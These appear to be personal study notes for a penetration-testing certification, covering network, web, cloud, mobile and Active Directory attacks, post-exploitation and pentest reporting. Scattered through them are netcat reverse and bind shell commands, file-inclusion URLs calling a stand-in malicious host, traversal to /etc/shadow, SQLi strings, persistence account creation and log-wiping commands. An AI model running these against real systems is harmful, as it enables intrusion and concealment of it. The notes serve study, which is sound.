- change default Native VLAN
- never add user devices to Native VLAN
- switch spoofing
- attacker uses DTP to negotiate trunk port with a switch
- attacker computer pretends to be a switch and gains access to all VLANs
- protections:
- disable DTP!
- MAC table overflow
- switch acts like a hub when overloaded
- just repeats all frames out of every port
NAC Bypass:
- NAC checks device to see if authorized to connect to network
- used to just use MAC
- now uses inspection to see if up to date, etc...
- put in isolation if not compliant
- 3 types of NAC:
- Persistent:
- piece of software installed on device requesting access to network
- Non-persistent:
- requires user to log in to captive portal and download an agent to scan device for compliance
- Volatile/Agentless:
- install scanning engine on domain controller instead of endpoint device
- good for BYOD
- run in volatile RAM
- Bypass methods:
- exploit authorized host
- make device look like something else (spoof to authorized device)
On-Path Attack:
- methods:
- ARP poisoning:
- DNS poisoning:
- Rogue WAP:
- Rogue hub/switch:
- replay:
- data is captured and repeated immediately or delayed and repeated
- data usually encrypted, can't read/modify
- SSL Stripping:
- attacker tricks encryption app to present user with HTTP, not HTTPS
- allows to decrypt, then read/modify (relay)
- Downgrade Attack:
- attacker forces low encryption
- can be with any protocol
- relay:
- read/modify data
- data not encrypted (or weak encryption)
Password Attacks:
- Dictionary attack
- Rainbow Table
- precomputed hash value table containing known passwords
- crackstation.net
- 15 Billion hashes
- Brute Force
- Hash Cracking
- Password Spraying
- use common passwords across multiple accounts
- Credential Stuffing
- tests stolen user account names and passwords against multiple websites
- people use same credentials over many sites
- 2FA prevents this & having diff passwords for everything
- Tools:
- Passwords Cracking:
- John the Ripper
- Cain and Abel
Pass the Hash:
- using password hash as is to authenticate to same network it originated on
- AKA NTLM Relay Attack
- present hash to SMB/Kerberos
- Tools:
- Meterpreter: in Metasploit
- Mimikatz
- open source app
- view and save auth credentials to perform pass the hash attacks
- incorporated into Metasploit
- Kerberosting:
- any domain user account w service principal name can set service granting ticket
1) get user service principal names (SPNs) to ID all accounts that are candidates for Kerberoasting
2) get service tickeet from one of the SPNs that's a god target (like a server)
3) dump service ticket to file
4) crack account's plaintext password (offline w service ticket file)
- prevention:
- service and server accounts password changes more frequently
- Golden Ticket attack
- golden ticket is a master ticket from Kerberos TGT (Ticket Granting Ticket) used for any service
- Silver Ticket attack
- silver ticket is a ticket granting service ticket (only good for certain Kerberos services)
Intro to Metasploit:
- Module Types:
- exploits: software that delivers a payload
- auxiliary: scanners, sniffers, fuzzers, spoofers
- post: post exploitation tools
- payloads: actual malicious code
- encoders: ensure payload makes it to dest in one piece and undetected (encode/encrypt)
- nops: non-operations keeps payload sizes consistent
- evasion: techniques to evade
- Metasploit syntax:
- "msfconsole" --> start Metasploit
- "search " --> search for things
- use module-type/OS/service/name-of-exploit
- ex: use exploit/windows/smb/ms17_010_psexec
- then type "options" to see all options
- "run" --> start attack
- "exit" --> leave Metasploit
Netcat:
- command: "nc"
- Bind shell:
- attacker installs listening port onto victim machine
- used to be more easy, now security is higher
- syntax:
- nc -l -p 443 -e cmd.exe
- listen on port 443, execute cmd.exe
- on victim machine
- nc 443
- connect to listener
- on attacker machine
- Reverse shell:
- attacker installs listener on their own device and configures listening port
- make victim connect to the listener
- trick user with social engineering or install malware on their device
- syntax:
- nc -l -p 443
- listen on port 443
- on attacker machine
- nc 443 -e cmd.exe
- victim connects to attacker's machine and gives Windows machine's cmd
- on victim machine
Application Vulnerabilities
Race Conditions:
- outcome from a process is dependent on order and timing of events
- multiple threads attempting to write to a variable/object at same time
- hard to detect
- Vulnerabilities:
- Dereferencing:
- code attempts to remove relationship between pointer and thing it points to in memory
- TOCTOU (Time to Check Time to Use):
- change between when app checks resource and when app uses resource
- protection:
- Mutex (Mutually Exclusive Flag)
- acts as gatekeeper to section of code --> only one thread can be processed at once
- Deadlock
- problem with locks like Mutex
- lock cannot be removed!
- Exploit:
- Dirty Cow
Buffer Overflows:
- process stores data outside memory range allocated by dev
- memory range = buffer
- store data temporarily
- over 85% of data breaches were caused by Buffer overflow
- stack:
- reserved area of memory where program saves return address when function call instruction is received
- smashing the stack:
- attacker fills up buffer with NOP instructions
- protections:
1) patch management
2) use secure coding practices
- boundary checking
- input validation
3) ASLR (Address Space Layout Randomization)
- prevents attacker from guessing where return pointer has been set to call back to
4) DEP (Data Execution Protection)
- block apps attempting to run from protected memory locations
- Integer overflow:
- computed result from operation is too large to fit in variable
- protections:
- boundary checks
- input validation
Buffer Overflow Attacks:
Authentication & References:
- Broken authentication:
- insecure authentication mechanisms that allow attacker to gain entry
- weak encryption, auth system, password reset, session id, etc...
- never pass session id in URL
- in OWASP top 10!
- IDOR:
- manipulate URL to gain access to resource without auth
Improper Error Handling:
- what happens when error occurs?
- even error message can give info to attacker
Improper Headers:
- 10 HTTP Response Headers:
- HSTS
- HTTP strict transport security
- allows web server to notify browsers to only request HTTPS, not HTTP
- HPKP
- HTTP public key pinning
- allows HTTPS sites to resist impersonation by attackers using fraudulent certificates
- X-Frame-Options
- prevents clickjacking
- X-XSS-Protection
- enables cross site scripting filter in browser
- X-Content-Type-Options
- prevents browser from interpreting files as something other than what they're declared as in header
- Content-Security-Policy
- impacts how browsers render pages
- X-Permitted-Cross-Domain-Policies
- sends cross-domain policy file to client and specifies if browser has permission to handle data across domains
- Referrer-Policy
- governs which referrer info should be included with requests made
- Expect-CT
- tells browsers to evaluate connections to host emitting header for cert transparency compliance
- Feature-Policy
- allows dev to selectively enable/disable use of various browser features and APIs
- ex: using location, camera, etc... in browser
- prevent:
- XSRF
- XSS
- Downgrade attack
- Cookie Hijacking
- User Impersonation
- Clickjacking
Code Signing:
- guarantees integrity and authenticity
- code signed with dev private key
Vulnerable Components:
- client-side/server-side processing
- is code run on server/client?
- client-side = less secure, but faster
- JSON REST
- client/server model for interacting with content on remote systems over HTTP
- SOAP
- exchanging structural info for web services (REST is more secure)
- Browser Extensions
- ex: adobe flash is known vulnerability, no longer used
- HTML5
- AJAX
- group of related technologies used on client side to create asynchronous web apps
- same origin policy -->
- Machine Code
- code that computer executes
- specific to processor type
- Bytecode
- cross platform code
- intermediate code produced by compiler, translated to machine code
Software Composition:
- software composition analysis:
- process of analyzing software for open source components
- so many 3rd party dependencies
- open source dependencies have vulnerabilities
- tools:
- OWASP dependency check tool
- find dependencies that have vulnerabilities
- OWASP dependency track tool
- more detailed
- problems:
- poor exception handling
- security misconfigurations
- weak cryptography implementations
- information disclosure
- end of life/end of support
- code injection
- regression issues
- introducing vulnerabilities when adding something to code
- regression testing: validate everything is still good
Privilege Escalation:
- arbitrary code execution: attacker running code on your device
- remote code execution: type of arbitrary code execution, but remotely
- privilege escalation:
- two types:
1) vertical privilege escalation:
- normal user to admin/root user
2) horizontal privilege escalation:
- modify resources not allowed on same level
- rootkit:
- installed at the kernel level (ring 0)
- types:
- kernel mode rootkit: most dangerous
- user mode rootkit: no access to kernel
Application Attacks
Directory Traversals:
- type of injection attack
- access files/directories/commands from the website
- ex: diontraining.com/../../../etc/shadow
- password hashes file
- Windows = ..\
- Linux = ../
- %2E%2E%2F = ../
- file inclusion attack:
- attacker can download file from arbitraty location or upload executable/script to open backdoor
- types:
- remote file inclusion:
- pass malicious script as login
- diontraining.com/login.php?http://malware.bad/malicious.php
- local file inclusion:
- add file to app/site that already exists on hosting server
- run cmd
- diontraining.com/login.php?user=../../Windows/system32/cmd.exe%00
- protection:
- input validation
Dirbuster:
- multithreaded java app to brute force file names and directories on web app servers
- finds all files and directories (even hidden)
Cross-Site Scripting (XSS):
- injects malicious script into trusted site
- input validation
- non-persistent XSS happens once
- persistent XSS embeds XSS into back end database
- DOM XSS
- client side attack
- exploit client browser using client side script to mod content and layout of web page
- document.write
- anything with script = XSS on exam
- document.x = DOM XSS on exam
Cross-Site Request Forgery (CSRF):
- persistent cookie: stored in browser cache
- non-persistent cookie: reside in memory
- session hijacking:
- disconnect host and replace with own machine by spoofing IP
- steal token / session cookie
- tokens should be random but sometimes aren't
CSRF:
- exploits session started on another site within same browser
- 2FA is good protection
- require user to enter current password when changing (prevent CSRF attack)
SQL Injections:
- database attack
- syntax:
- select --> read
- insert --> write
- delete --> remove
- update --> overwrite
- injections into:
- URL
- Form Fields
- Cookies
- POST data
- HTTP Headers
- ex: `OR 1=1; --> in password field, logs you in = true statement
- comma and true statement = SQLi for exam 'OR 8=8;
- prevention:
- input validation
- WAF
Burp Suite & SQLmap:
- interception proxy
- *** dont need to know how to use BurpSuite for Exam ***
- SQLmap used to perform automated SQLi
- checks a bunch of SQLi
OWASP ZAP:
- Zed Attack Proxy
- interception proxy and web app vulnerability scanning tool
- similar to BurpSuite
XML Injections:
- from client to server OR server to server
- protections: input validation, encryption,
- vulnerabilities: spoofing, request forgery, code injection
- Types:
- XML Bomb (Billion Laughs)
- XML with entities that expand to exponential sizes
- consume all memory and crashing host
- XXE (XML External Entity)
- embed a request for a local resource
- type of local file inclusion (directory traversal)
Other Injection Attacks:
- LDAP injection:
- LDAP used for accessing and maintaining distributed directory info/services
- attack: fabricate LDAP statements created by user input
- Command Injection:
- attacker can execute arbitrary shell commands on host via vulnerable web app
- Process Injection:
- execute arbitrary code in address space of separate live process
Cloud Attacks
Attacking the Cloud:
- attack vectors:
- malware injection attack:
- add infected service module to cloud service
- SQLi, XMLi, etc...
- side-channel attack:
- exploit indirect effects of system
- D2O (direct to origin):
- bypass reverse proxy to directly attack original IP/network
- DoS attacks
- amplification/volumetric attack
- saturate bandwidth
- fragmentation of requests
- sending multiple fragmented HTTP requests
Credential Harvesting:
- normally by email phishing
- account takeover
- SAM file (Security Account Manager)
- contains hashed passwords of all users
- DLL files:
- library file with code that is referenced by multiple apps
Misconfigured Assets:
- account, storage, container, resource that is vulnerable to attack due to current configuration
- cloud federation:
- infrastructure, platform, software to create apps hosted by cloud
- IAM (Identity Access Management)
- misconfiguration is really bad
- personnel type resources: weakest link, employees
- end user training
- privileged account
- shared account
- endpoint type: desktop, phone, etc...
- server type: prove identity of server
- software type: digitally sign code
- role type: who has rights to do what
- cloud storage:
- Bucket: container
- AWS
- objects placed in container
- objects = files
- Blob: container
- Azure
- objects placed in container
- objects = files
- IAM manages authorizations
- CORS (Cross-Origin Resource Sharing):
- allows objects to be read from multiple domain names and displayed to end user
- container vs virtualized server:
- virtualized server = whole OS
- container = segmented part of OS for just one app
- less secure than separate virtual machines but better for resources
Metadata Service Attack:
- provide data about company's instances to config everything
- SSRF (Server Side Request Forgery)
- uses trust between server and resources it can access
- whenever server accepts requests without validating URL
- allows attacker to exploit apps, take metadata, extract credentials, pivot into cloud account
SDK (Software Development Kit):
- tools to create apps, specific to programming language
- SDKs can have vulnerabilities
- programs using SDKs can inherit these vulnerabilities
Auditing the Cloud:
- tools:
- ScouteSuite:
- open source python tool
- custom rules, audit IAM, etc...
- Prowler:
- AWS only
- scan for compliance
- Pacu:
- AWS only
- exploitation framework for AWS cloud
- CloudBrute:
- find target's files, infrestructure, apps, etc...
- cross platform cloud (AWS, Azure, Google, etc...)
- like DirBuster but for cloud
- Cloud Custodian:
- open source security tool
- admins can set policies based on resource types
Attacks on Mobile Devices
EMM/MDM (Enterprise Mobility Management):
- EMM: policies and tools
- MDM: technical controls
- app control
- password functionality
- MFA requirement
- token based access to network (dig cert)
- trust certificate: globally ids trusted device in organization
- can be copied by attacker, not good
- user-specific certificate: assigned to unique device
- patch management
- remote wipe
- firmware updates
Deployment Options:
- COBO (Corporate Owned Business Only)
- COPE (Corporate Owned Personally Enabled)
- CYOD (Choose Your Own Device)
- BYOD (Bring Your Own Device)
- VMI (Virtual Mobile Infrastructure)
- virtual mobile OS accessed over internet
- sandboxed environment
Mobile Reconnaissance Concerns:
- digital forensics
- wearable technology
- wireless eavesdropping
Mobile Device Insecurity:
- jailbreaking
- rooting
- custom firmware/ROM
- systemless root:
- does not modify system partifions or files, less likely to be detected
- sideloading: install app from .apk
- unsigned apps
- security best practices:
- device config profiles/protocols
- MDM profiles
- full device encryption (FDE)
- HSM inside device like a TPM for encrypting everything
- VPNs
- OS: always on
- App: per-app basis
- Web-based: location masking (browser)
- Location Services
- Geofencing
- geo boundaries
- Geotagging
- add metadata to files
Multifactor Authentication:
- AAA (Authentication, Authorization, Accounting) Framework
- factors:
- something you know
- something you have
- something you are
- attributes:
- somewhere you are
- something you can do
- something you exhibit
- someone you know
- FAR (False Acceptance Rate)
- higher is easier to hack in
- FRR (False Rejection Rate)
- higher means authorized people can't even get in
- CER (Crossover Error Rate)
- where FAR & FRR intersect on a graph
- equal amount of FAR & FRR
- perfect amount of sensitivity for biometrics
- SMS: MFA
- easy for someone to reassign phone number
- push notification: apps that provide MFA key
- apps can be vulnerable
- authentication apps:
- same as physical token generator but just software
- TOTP (Time based One Time Password): algorithm uses secret key and time of day
- key changes every 30 sec or so
- HOTP (HMAC based One Time Passord algorithm): only once per session
- use once and never again
- in-band authentication:
- receive TOTP/HOTP on same device you are logging in on
- out-of-band authentication:
- receive TOTP/HOTP on a different device than the one you are logging in on
- More secure
Mobile Device Attacks:
- spyware, trojans, rootkits, viruses, worms
- overreach of permissions on apps
Malware Analysis:
- sandboxing
- honeypot lab
- reverse engineering
- program packer: method of partially compressing an executable
- self extracting
Mobile Device Attack Tools:
- Drozer
- multiple tools to hack Android OS (like Metasploit for Android)
- APKX
- APK decompiler
- see source code of APKs
- find vulnerabilities in code
- APK Studio
- cross-platform IDE
- devs use it to write source code for APKs
- attacker can reverse engineer/modify source code
- decompiler, debugger, compiler built in
- APK SDK
- large set of tools/libraries/docs/code samples/guides for APK development
- Frida
- open source dev tools for pen testers
- works on all OSs: Android, MacOS, iOS, Linux, Windows
- Objection
- powered by Frida
- runtime mobile exploration toolkit
- assess security posture of mobile apps without jailbreak/root
- Needle
- open source, modular framework
- security assessment for iOS
- decomissioned
- Ettercap
- toolkit for on-path attacks
- not only mobile, works for any host
- kali default installed
- MobSF (Mobile Security Framework)
- all in one pentesting app for mobile devices, malware analysis, etc...
- static & dynamic analyzer
- Burp Suite
- web interception proxy
- special module for iOS too
- Postman
- platform for building APIs
Attacks on Specialized Systems
IoT Devices:
- wifi
- bluetooth
- RFID
- NFC
- Infrared
- Zwave
- Home Automation
- short range, low latency data transfer
- lower data rates than wifi
- ANT+
- collection of sensor data
- car sensors, etc...
- M2M vs M2P:
- machine to machine communication
- machine to person communication
IoT Vulnerabilities:
- outdated firmware
- nobody updates
- insecure defaults
- hard-coded configs
- cleartext communication
- data leakage
Embedded Systems:
- computer system designed to do one thing very well
- almost never updated
- limited support
- PLC (Programmable Logic Controller)
- computer designed for industrial setting to automate/monitor mechanical systems
- HVAC, water control, etc...
- Ladder Logic: programming language for PLCs --> looks like flowchart
- input & output with HMI (Human Machine Interface)
- data historian: catalogs data from ICS (all events)
- SoC (System on a Chip)
- processor that integrates all functionality needed on one chip
- multiple PLCs can be put on one SoC
- RTOS (Real Time Operating System)
- ensures response for time-critical tasks
- open/close valves in nuclear plant
- FPGA (Field Programmable Gate Array)
- processor that can be programmed to perform specific function by customer
- instead of using an ASIC (Application Specific Integrated Circuit)
- can only do one thing, burned in
ICS & SCADA Devices:
- OT (Operational Technology) rather than IT
- technology that interacts with real world
- availablility is most important (not confidentiality or integrity)
- IIoT (Industrial IoT)
- ICS
- mechanism for automation and processes of embedded devices
- DCS (Distributed): connect multiple ICSs together
- Fieldbus: link diff PLCs together
- SCADA
- type of ICS that manages large scale, multi-site devices and equipment over WAN
- ex: smart meter --> sends our usage directly to power company
ICS Protocols & Vulnerabilities:
- CAN (Controller Area Networks)
- allow comm between embedded PLCs
- OBD-II port to diagnose onboard computer on all cars
- trusts all connections
- methods to connect:
- direct with cable/computer
- small device to remotely connect
- use cellular modem built into car
- onboard wifi
- ex: cars
- Modbus
- control servers and SCADA host can query and change configs of PLCs over network
- proprietary protocol, NOT TCP/IP
- DDS (Data Distribution Service)
- facilitates scalability, performance and QoS features for industrial use
- SIS (Safety Instrumented System)
- return industrial process to safe state after condition is detected
- monitor and fixes
- Nuclear power plants
Data Storage Vulnerabilities:
- direct attached storage
- NAS (network attached storage)
- attached to network, dedicated to provisioning data access
- connected over the network, has it's own filesystem
- SAN (storage area networks)
- separate subnetwork with storage devices and servers for large amount of data
- no operating system filesystem
- attack vectors:
- misconfigurations
- improper permissions
- default configs
- software vulnerabilities (NAS)
- improper error messages and debug handling
- injection vulnerabilities
- lack of user input sanitization
- management interface vulnerabilities
- IPMI (Intelligent Platform Management Interface)
- allows admins to monitor and control all servers from central interface
- must be secure
Virtual Environments:
- Type 1: hypervisor runs directly on hardware (bare metal)
- Type 2: hypervisor runs ontop of OS
- VDI (Virtual Desktop Infrastructure)
- host virtual OSs on server
- all processing goes to server, just need network
- cloud server must keep everything secure
- centralized model: host all OSs on single server/server farm
- hosted model (DAAS): maintained by service provider, provides DAAS
- remote virtual desktop model: copy OS to local machine before being used
- terminal services: server-based, runs apps in central location
- application streaming: client-based, sandboxed, isolated form client OS
Virtual Machine Attacks:
- VM Escape
- exploits to hypervisor's code
- easier for Type 2 hypervisor
- VM Hopping
- hop from one VM to another
- VM Sprawl
- creating multiple VMs without turning them off when not in use
- Sandbox Escape
- VM repositories
- company stores images
- change templates/images
- live migration: sending one VM to another while running
- data remnants: left over data
Containerization:
- multiple containers runs on host one OS
- share same host kernel
- common libraries = biggest vulnerability
- can't communicate with each other
- if host OS is compromised, all containers are compromised
- container managers
- Docker
- Parallels Virtuozzo
- OpenVZ
Post Exploitation
- everything after initailly breaking into the system
Enumerating the Network:
- users, groups, hosts, forests, sensitive data, unencrypted files
- map out attack surface by scanning the above
- Windows:
- AD (Active Directory)
- everything is in AD domain for Windows system enterprises
- commands:
- Get-NetDomain: get current user's domain
- Get-NetLoggedon: get users logged on to given computer
- Linux:
- cat /etc/passwd
- uname -a: system info
- env: environmental variables
- setup network sniffer
- Metasploit interpreter payload
Network Segmentation Testing:
- many compliances require network segmentation (PCI DSS)
- segmenting methods:
- subnets
- VLANs
- firewalls
- testing network segmentation:
- make sure less secure networks can't communicate with higher security networks
- firewall ACL rules improper
- VLAN hopping with DTP or double tagging
- port scans (not able to see IPs of secure subnet)
- check apps that work between high secure & low secure subnets
- VPNs may allow access to high security subnet
Lateral Movement & Pivoting:
- lateral movement: moving along same level of privilege to search for problems
- pivoting: use one infected computer to attack another
- once inside pc, you're past the firewall
Pass the Hash:
- forward hashed password to authenticate to SMB/Kerberos
- usually used to elevate privileges
- Mimikatz:
- tool to scan system memory for cached password hashes processed by LSASS.exe
- LSASS = Local Security Authority Sybsystem Service
- incorporated into Metasploit
- Windows Defender will block pass the hash
- need to turn off defender first
- hard to detect because it's a legit way to auth
- admin accounts should only be allowed for domain controllers
Golden Ticket:
- pass the hash works on local workstations not AD
- golden ticket is what you want when hacking AD
- golden ticket is universal Kerberos ticket (admin access)
- krbtgt hash:
- kerberos tgt ticket hash
- like a private key of root certificate authority
- used to generate tickets for everyone to access kerberos
- how Kerberos works:
- user/service sends request for ticket to KDC (Key Distribution Center)
- KDC creates TGT (Ticket Granting Ticket) for client & encrypts it with client's password
- KDC sends encrypted TGT ticket to client
- client decrypts TGT ticket with password
- this proves client identity
- ticket expires after some time, will renew in background
- how to attack golden ticket:
- attacker accesses NTDS.DIT (file with all admin account hashes)
- dump NTDS.DIT file to id Kerberos TGT hash
- attacker creates a golden ticket with TGT hash
- defending:
- change all user passwords
- change krbtgt account password twice in short period of time
Lateral Movement:
- Remote access services
- access computer from a distance
- SSH, RDP, Telnet, etc...
- WMIC (Windows Management Instrumentation Command-Line)
- terminal for users
- administrators can run scripts to manage computers
- PsExec
- alternative to Telnet
- for sys admins
- Windows Powershell
- task automation and config management
- exploit kits
- powershell empire
- GUI access after attack:
- Windows: RDP
- MacOS: Apple Remote Desktop
- Linux: X Window System
- VNC (Virtual Network Computing)
- connect to GUI on any OS
- RPC DCOM
Pivoting:
- use compromised host to spread attack to other points in the network
- port forwarding: send traffic from open port to a host on a diff subnet
- use multiple PCs as proxies to pivot to another network
- those proxy PCs are the pivot points
- VPN pivoting: run VPN server outside network to relay data to VPN client
- hide attack source
- modify routing tables: on routers or hosts
- ProxyChanis: tool for this
Escalating Privileges:
- horizontal privilege escalation VS vertical privilege escalation
- privilege:
Ring 0) Kernel
Ring 1) Device Drivers
Ring 2) Device Drivers
Ring 3) Applications
- Linux:
- SUID (Set User ID)
- -rw-r--r-- --> first column indicates permissions for user
- read and write permissions
- SGID (Set Group ID)
- -rw-r--r-- --> second column indicates permissions for group
- only read permissions
- Sticky Bit:
- users can create files, read, execute files owned by others (not remove)
- -rw-r--r--x-t --> t = sticky bit
- enum4linux: tool to enumerate
- Ret2libc: attack by overwriting program stack to create new stack that calls sys function
- priv esc attack
- cronjobs: scheduled tasks
- Windows:
- Cpassword: attribute that stores password in group policy preference item
- easily decripted
- LDAP: if not SSL enabled, sends credentials over network in clear text
- Kerberoasting: any domain user account with SPN to set TGS --> see above
- LSASS = Local Security Authority Sybsystem Service
- login credentials
- SAM database: file containing user passwords in Windows as LM hash or NTLM hash
- DLL Hijacking: make pc load malicious DLL instead of legit DLL
- commonly used for persistence
- Exploitable services
- unsecure file/folder permissions
- windows apps
- bypass UAC (User Access Control)
- All OSs
- keylogger: software or hardware
- Kernel Exploits: search CVEs
- guest accounts should be disabled
- default admin accounts
Upgrading Restricive Shells:
- restrictive shell: cannot perform certain functions
- upgrading:
- import python terminal
- python -c 'import pty; pty.spawn("/bin/bash")'
- import perl terminal
- perl -e 'exec /bin/sh";'
- enter Vi or VIM and launch shell from there
- :set shell=/bin/sh:shell
- non-interactive shell: can't receive any info, commands don't do anything
- spawn new shell
- /bin/bash -i
Detection Avoidance
Trojans & Backdoors:
- RAT (Remote Access Trojan):
- type of backdoor (remote)
ex: back orifice, blackshades, darkcomet, sub7, netbus, pupy
- rootkit:
- infect at low level with root access
- hard to find, below OS
- usually trojan/backdoor
Creating Persistence:
- maintaining access
- cron jobs, etc...
- APTs do this
- create new accounts to access:
- Windows:
- net user /add --> command to create user
- net localgroup administrators /add --> make user admin
- Task Scheduler:
- same as Crontab in Linux
- schtasks --> command for scheduling tasks
- schtasks /create /sc /tn /tr
- regedit:
- add registry keys to make process run everytime Windows starts
- reg add ...
- service = background process
- Linux:
- su -
- useradd
- passwd
- make user admin --> edit /etc/passwd --> change user ID & group = 0
- Crontab: used by sys admins to schedule routine tasks
- ex: 45 23 * *6 /home/user/scripts/exportdump.sh
- after 45min of 23rd hr on the 6th day, run script
- ***** = min|hr|day of month|month|day of week
- Daemons = background process
- add startup Daemons:
- edit /etc/init.d OR /etc/systemd
- bind shell & reverse shell
- look above in the notes for commands for both of the above
- combine bind/reverse shell with crontab/schtasks/regkeys for persistence
Living Off the Land:
- fileless, runs as script, sometimes deletes itself
- steps of an attack:
1) dropper/downloader
- dropper: malware to install/run other malware
- downloader: retreive additional tools for dropper
- code injection: run malicious code with ID number of a legit process (obfuscate it)
- Masquerading: dropper replaces legit executable with malicious one
- DLL injection: dropper forces process to load as part of a DLL
- DLL Sideloading: dropper loads malicious DLL at runtime by exploiting a legit program's manifest
- Process hollowing: dropper rewrite memory locations containing process code with malware code
- anti-forensic techniques:
- encrypting payload
- compressing payload
- obfuscating payload
- shell code: lightweight script for malware
2) maintain access
3) strengthen access
4) actions on objectives
5) concealment
- Living off the land:
- exploit technique that uses standard system tools and packages to perform intrusions
- Windows:
- PsExec
- WMI (Windows Management Instrumentation)
- PowerShell
- WinRM (Windows Remote Management)
- VBScripts (Visual Basic Scripts)
Data Exfiltration:
- HTTP/HTTPS transfers
- attacker uses commercial file sharing to extract data (ex: Dropbox)
- HTTP requests to databases
- SQLi
- IOC: unusual spike in PHP or other scripts
- DNS
- requests for TXT files
- Overt channels
- FTP, instant messaging, peer-to-peer, email, etc...
- Explicit tunnels
- use SSH/VPN to create tunnel to transmit data
- atypical geographic location is a red flag
- best mitigation: encryting everything
Covert Channels:
- stealthy transmission of data (exfiltration)
- transmit data over nonstandard port
- encode data in TCP/IP packet headers
- segment data into multiple packets
- obfuscating data using hex
- transmit encypted data
- covert channel creation:
- storage methods:
- use one process to write to a storage location and another process to read from it
- timing methods:
- use one process to alter system resource to change response time and signal info to recipient process
- mitigation:
- IPS/IDS
Steganography:
- conceal data within file/image/etc...
- no encryption
- circumvents IPS blocking file sending for files with important signatures because hidden in another file with a signature that isn't important
- tools:
- steghide
- stylesuxx.github.io/steganography/
Covering Your Tracks:
- erase, modify, disable evidence
- clear log files
- Windows:
- system logs
- application logs
- security logs
- event logs
- how to delete:
- Meterpreter: clearev
- CMD: wevtutil cl Application
- Windows doesn't save cmd history by default (ALT+F7 clears while inside)
- Powershell: Clear-History
- no file shredding but can format entire drive
- format s: /fs:NTFS /p:1
- Linux:
- /var/logs
- how to delete:
- echo "">/var/log/syslog (overwrites log file with nothing)
- SED (Stream Editor):
- search for and delete/insert/edit specific parts of file without opening it
- sed -i 'malware' /var/log/auth.log
- remove bash history:
- echo "" > ~.bash_history OR history -c
- prevent saving history: export HISTSIZE=0
- shred files (not recoverable):
- shred -zu
- can modify log files to deceive people into thinking someone else attacked (plant another IP)
- use timestomp
- change access time of file
- touch updates to current time
- ctime: changes time to given date/time
- Meterpreter has built-in timestomp tool
- change files' ownership to original user
- delete installed malware
- hide files/folders
- create hidden files/folders
- Linux:
- . files
- Windows:
* places people usually don't look
- sys32 folder
- users folder
- hidden attributes
- alternative data streams
Post Exploitation Tools:
- Empire
- command and control framework using PowerShell for post-exploitation tasks
- find on github
- not well maintained anymore (antivirus will find it)
- Mimikatz
- open source tool
- focused on exploiting Kerberos
- BloodHound
- explore AD trust relationships and abuse rights on AD objects
Communication & Reports
Communication Paths:
- primary contact
- responsible for handling the project
- high-ranking person
- technical contact
- handles technology elements of the engagement
- know constraints, scope, etc...
- emergency contact
- person responsible for urgent matters
- sometimes SOC lead, or primary contact, etc...
Communication Triggers:
- status reports
- progress updates
- asking for permissions
- frequency depends on agreement
- critical findings
- finding a critical vulnerability
- indicators of prior compromise
- IoC (Indicator of Compromise)
Reasons for Communication:
- situational awareness
- both sides need to know what is going on during engagement
- de-confliction
- confirm attack is from pentester
- tell pentester to stop attacking if IoC found
- de-escalation
- decreasing severity/intensity/magnitude of an attack from pentester
- goes along with de-confliction
- false positives
- pentester asks if something is a true vulnerability
- if there are too many things to test, narrow down
- criminal activity
- IoC
- if finding anything illegal (child porn for example)
- must stop pentesting
- goal reprioritization
- chaning goals
Presentation of Findings:
- depends on audience
- technical people
- all technical details
- developers
- can change code
- MOST detail
- chief people (C-Suite) top dogs
- explain cost & benefit
- third party stakeholders
- PCI DSS
- report how compliant
Report Data Gathering:
- proper note-taking throughout with cronology
- screenshots, transcribed notes, file captures
- Normalization: put all notes into common format
- combine all data to make sense of it
- Dradis:
- reporting & collaboration tool
- consollodated reports from multiple tools/things
- Encrypt notes! May be sensitive info
Written Reports:
- Executive Summary
- high level overview for executives/management
- themes, comparisons, big problems
- concluding how secure everything was
- Scope Details
- re-itterate agreed upon scope
- Methodology
- highlevel description of standards/frameworks followed in pentest
- brief attack narrative: what you did chronologically
- highlevel (no details on how)
- Findings
- bulk of report
- can put more details in appendix
- list the following:
- findings
- remediations
- threat level
- risk rating
- risk prioritization
- business impact
- exploitation
- Metrics & Measures
- define metrics that you use to measure things in the report
- measure = what to measure
- metric = what's the ammount
- Remediation
- prioritize biggest 5-10 priorities
- recommend best ways to secure vulnerabilities
- Conclusion
- summarize whole report
- failures/success of organization
- key takeaways
- Appendix
- FULL detail of things
- referenced throughout report
- all supporting evidence
- screenshots of Nmap/other tools showing info, etc...
Common Themes:
- optional part of report for leadership in organization
- common themes/root cause/outbrief
- lax physical security
- corporate policy bypass
- lack of training/certifications
- poor patch management
- outdated protocols
- obsolete protocols
- improper processes
- non-hardened OS & services
- include possible remediations
Securing & Storing Reports:
- store reports offline and/or encrypted (maintain confidentiality)
- show reports only to people who need to know
- hash/digitally sign report (maintain integrity)
- maintain audit control
- maintain version control (digitally signed w time)
- retention time of report (how long client and you will store)
- discuss with client
- normally 12-24 months
Findings & Remediations
Security Control Categories:
- NIST special publication 800-53 (open source)
- AC (Access Control)
- AA (Accountability)
- IR (Incident Response)
- RA (Risk Assessment)
- ISO 27001 (proprietary)
- controls:
- technical/logical controls
- operational controls (ex: security guards / training)
- administrative controls
- functional controls:
- preventative
- corrective
- backups
- detective
- physical
- deterrent
- compensating
Selecting Security Controls:
Physical Controls:
Operational Controls:
- job rotation: keep people moving between responsibilities
- no one person maintains control for long
- mandatory vacations: rotate others through the job
- important in high security environment
- separation of duties:
- split knowledge: no one person has all details of things
- dual control: 2 people with their own keys to open a safe for example
- on boarding & offboarding: procedures for getting employees set up and disabling when gone
- user training: gamification is common now
- CTF (Capture The Flag): common for red team
- phishing simulation
- CBT (Computer Based Training)
Account Policies:
- username/password policies
- password complexity and length
- increase entropy
- 8 characters minimum
- prevent password reuse
- account lockout and disable if too many attempts
- disable account if user leaves job
- authentication policies
- location based: IP subnet on network
- geoloaction
- geofencing
- geotagging
- time based
- audits scheduled & log analysis
- permissions being used
- usage auditing
Administrative Controls:
- role based access control
- assign roles to restrict access to resources
- AD groups with roles
- good for high employee turnover
- minimum password policy
- NIST
- 8 char length
- no longer changing passwords every 60-90 days
- minimum length to keep password
- policies & procedures
- software dev life cycle (SDLC)
- testing
- unit testing: testing every piece/part
- integration testing: testing everything together
- validation testing: meets requirements
- acceptance testing: accepted by end users
- regression testing: when updating, don't break anything
- peer review: devs view eachother's code
System Hardening:
- reduce attack surface
- confidentiality & integrity checklist:
1) remove/disable devices not needed/used
2) install patches & updates
3) uninstall all unnecessary network protocols
- hosts should have NO well known ports open, only servers
4) uninstall/disable all unnecessary services & shared folders
5) use ACLs
6) restrict user accounts to least privilege needed
7) secure local admin/root account --> rename and change password
8) disable unnecessary default user & group accounts
9) verify permissions on system accounts & groups
10) install antimalware software & update regularly
